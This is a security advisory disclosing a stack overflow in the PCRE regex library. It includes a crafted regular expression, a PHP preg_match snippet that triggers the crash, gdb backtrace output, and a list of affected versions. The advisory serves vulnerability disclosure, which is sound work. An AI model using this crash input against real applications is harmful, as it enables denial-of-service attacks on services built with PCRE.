I. Summary
PCRE is a regular expression C library inspired by the regular expression capabilities in the Perl programming language. The PCRE library is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP.
PCRE library is prone to a vulnerability which leads to Stack Overflow. Without enough bound checking inside match(), the stack memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. At least, an attacker may exploit this issue to DOS the user running the affected application.
------------------------------------------------------------------
II. Description
Latest version of PCRE is prone to a Stack Overflow vulnerability which could caused by the following regular expression.
/^(?:(?(1)\\.|([^\\\\W_])?)+)+$/
To reproduce the problem, we could use pcretest provide by PCRE library or applications which is wrapped with PCRE such as PHP.
For pcretest, simply type the regular expression after the re>
For PHP, latest version of PHP 5.6.9 (wrapped with PCRE 8.37) could be triggered by following code snippet.
<?php
preg_match("/^(?:(?(1)\\\\.|([^\\\\\\\\W_])?)+)+$/","abcd",$arr);
?>
Other versions and applications may also be affected.
Following test is conveyed under Kali Linux (based on Debian x64) with php 5.6.9:
==============================================================
(gdb) r poc.php
Program received signal SIGSEGV, Segmentation fault.
0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB",
ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
1439 RMATCH(eptr, ecode, offset_top, md, eptrb, RM49);
(gdb) bt
#0 0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB",
ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#1 0x000000000047e2ee in match (eptr=0x7ffff7eb7d91 "DLAB",
ecode=0x10070dd "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
md=<optimized out>, eptrb=0x0, rdepth=11129)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:2061
#2 0x0000000000472f45 in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070b4 "\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11128)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:983
#3 0x0000000000472e2d in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11127)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1878
#4 0x0000000000472957 in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=0x7fffffffa9a0, eptrb=0x0, rdepth=11126)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#5 0x000000000047e2ee in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070e0 "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=<optimized out>, eptrb=0x0, rdepth=11125)
------------------------------------------------------------------
III. Impact
Stack Overflow
------------------------------------------------------------------
IV. Affected
PCRE 8.33, 8.34, 8.35, 8.36, 8.37 are confirmed to be vulnerable.
PCRE2 10.10 is also confirmed to be vulnerable.
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.